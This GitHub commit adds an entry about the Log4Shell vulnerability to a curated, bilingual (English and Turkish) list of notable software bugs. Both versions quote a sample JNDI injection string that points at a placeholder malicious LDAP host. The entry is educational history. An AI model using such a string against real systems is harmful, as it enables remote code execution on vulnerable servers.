Skip to content

Commit 1ea4e26

Browse files
committed
Add Log4Shell Vulnerability
1 parent 3c09725 commit 1ea4e26

2 files changed

Lines changed: 36 additions & 0 deletions

File tree

README-tr.md

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -42,6 +42,7 @@ Geliştiricilerin faydalı bulabileceği derlenmiş problemler, hatalar ve siste
4242
- [Rachel True'nun iCloud'da Yaşadığı Problem](#rachel-truenun-icloudda-ya%C5%9Fad%C4%B1%C4%9F%C4%B1-problem)
4343
- [MySpace Solucan (Samy Solucanı)](#myspace-solucan-samy-solucan%C4%B1)
4444
- [Şifre Hash İşlemini Bozan "PHP Hack" Problemi](#%C5%9Eifre-hash-%C4%B0%C5%9Flemini-bozan-php-hack-problemi)
45+
- [Log4Shell - İnterneti Çökertebilecek Güvenlik Açığı](#log4shell---%C4%B0nterneti-%C3%87%C3%B6kertebilecek-g%C3%BCvenlik-a%C3%A7%C4%B1%C4%9F%C4%B1)
4546
- [AI](#ai)
4647
- [Microsoft Tay Chatbot (2016)](#microsoft-tay-chatbot-2016)
4748
- [Çeviriler](#%C3%87eviriler)
@@ -450,6 +451,23 @@ Ek kaynaklar;
450451
- [https://bugs.php.net/bug.php?id=81744](https://bugs.php.net/bug.php?id=81744)
451452
- [https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4](https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4)
452453
454+
### Log4Shell - İnterneti Çökertebilecek Güvenlik Açığı
455+
456+
> Dünyadaki tüm Java uygulamaları etkilenebilir. %10'u bile büyük bir problem olur. Bu felaket olur.
457+
>
458+
> [Christian Grobmeier, Log4j geliştiricisi](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)
459+
460+
Aralık 2021'de bir güvenlik araştırmacısı, dünya çapında milyonlarca uygulama tarafından kullanılan yaygın bir Java günlük kütüphanesi olan Log4j'de kritik bir güvenlik açığı keşfetti. Log4Shell (CVE-2021-44228) olarak adlandırılan bu açık, mümkün olan en yüksek puan olan 10 CVSS puanı aldı. Saldırının uygulanması korkutucu derecede basitti: saldırganlar, kullanıcı adları, arama kutuları ve hatta Minecraft sohbet mesajları gibi günlüğe kaydedilen herhangi bir girdi alanına kötü amaçlı bir JNDI dizesi enjekte ederek uzaktan kod çalıştırabiliyorlardı.
461+
462+
Bu güvenlik açığı, Log4j'nin Java Naming and Directory Interface (JNDI) aracılığıyla uzak sunuculardan yazılım bileşenlerini yükleme özelliğini istismar ediyordu, ancak kütüphane bu lookup dizelerinin güvenilir kaynaklardan gelip gelmediğini doğrulamıyordu. `${jndi:ldap://malicious-server.com/exploit}` gibi basit bir dize tüm sistemleri tehlikeye atabiliyordu.
463+
464+
Log4Shell, Fortune 500 şirketleri, devlet sistemleri ve Minecraft gibi popüler uygulamalar dahil olmak üzere milyarlarca cihazı etkiledi. Bu olay, kritik açık kaynak altyapısını sürdürmenin gizli insan maliyetini ortaya çıkardı, çünkü gönüllü geliştiriciler kendilerini internetin yarısını etkileyen bir güvenlik açığını yamalamakla sorumlu buldular. Bu kriz, kritik açık kaynak projelerini daha iyi desteklemek ve güvence altına almak için GitHub Secure Open Source Fund gibi girişimlere yol açtı.
465+
466+
Ek kaynaklar:
467+
468+
- [Log4Shell'in anlatılmamış hikayesi](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)
469+
- [Log4Shell güvenlik açığı](https://en.wikipedia.org/wiki/Log4Shell)
470+
453471
## AI
454472
455473
### Microsoft Tay Chatbot (2016)

README.md

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -42,6 +42,7 @@ A curated list of bugs, problems and failures that developers may find useful to
4242
- [Rachel True's Problem On iCloud](#rachel-trues-problem-on-icloud)
4343
- [The MySpace Worm (Samy Worm)](#the-myspace-worm-samy-worm)
4444
- [The PHP Hack that Broke Password Hashing](#the-php-hack-that-broke-password-hashing)
45+
- [Log4Shell - The Vulnerability That Broke the Internet](#log4shell---the-vulnerability-that-broke-the-internet)
4546
- [AI](#ai)
4647
- [Microsoft's Tay Chatbot (2016)](#microsofts-tay-chatbot-2016)
4748
- [Translations](#translations)
@@ -450,6 +451,23 @@ Further readings;
450451
- [https://bugs.php.net/bug.php?id=81744](https://bugs.php.net/bug.php?id=81744)
451452
- [https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4](https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4)
452453
454+
### Log4Shell - The Vulnerability That Broke the Internet
455+
456+
> Literally all Java applications in the world could be affected. Even 10% would be a major problem. This would be catastrophic.
457+
>
458+
> [Christian Grobmeier, Log4j maintainer](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)
459+
460+
In December 2021, a security researcher discovered a critical vulnerability in Log4j. The vulnerability, dubbed Log4Shell (CVE-2021-44228), received a perfect 10 CVSS score - the highest possible rating. The exploit was frighteningly simple: attackers could execute remote code by injecting a malicious JNDI string into any logged input field, such as usernames, search boxes, or even Minecraft chat messages.
461+
462+
The vulnerability exploited Log4j's feature that allowed loading software components from remote servers through Java's Naming and Directory Interface (JNDI), but the library didn't validate whether these lookup strings came from trusted sources. A simple string like `${jndi:ldap://malicious-server.com/exploit}` could compromise entire systems.
463+
464+
Log4Shell affected billions of devices across Fortune 500 companies, government systems, and popular applications like Minecraft. The incident exposed the hidden human cost of maintaining critical open source infrastructure, as volunteer maintainers found themselves responsible for patching a vulnerability affecting half the internet. The crisis led to initiatives like the GitHub Secure Open Source Fund to better support and secure critical open source projects.
465+
466+
Further readings:
467+
468+
- [Inside the breach that broke the internet: The untold story of Log4Shell](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)
469+
- [Log4Shell vulnerability](https://en.wikipedia.org/wiki/Log4Shell)
470+
453471
## AI
454472
455473
### Microsoft's Tay Chatbot (2016)

0 commit comments

Comments
 (0)